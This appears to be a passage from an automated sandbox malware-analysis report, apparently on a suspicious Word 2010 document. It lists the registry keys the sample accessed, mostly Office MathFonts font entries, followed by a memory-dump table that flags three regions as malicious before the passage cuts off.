HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\30010
30010
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\30010
30010
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 339 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4497000
trusted library allocation
page read and write
 malicious
5E1000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
890000
heap
page read and write
470F000
stack
page read and write
44C000
stack
page read and write
4B9E000
stack
page read and write
3C70000
heap
page read and write
3AA000
heap
page read and write
476A000
heap
page read and write
2E3000
trusted library allocation
page read and write
31E000
heap
page read and write
249C000
stack
page read and write
52CE000
stack
page read and write | page guard
4769000
heap
page read and write
270000
heap
page read and write
7590000
trusted library allocation
page read and write
7CE000
stack
page read and write
CAD000
stack
page read and write
5F1E000
stack
page read and write
2A35000
trusted library allocation
page read and write
160000
heap
page read and write
285000
heap
page read and write
98E000
stack
page read and write
45B000
heap
page read and write
183000
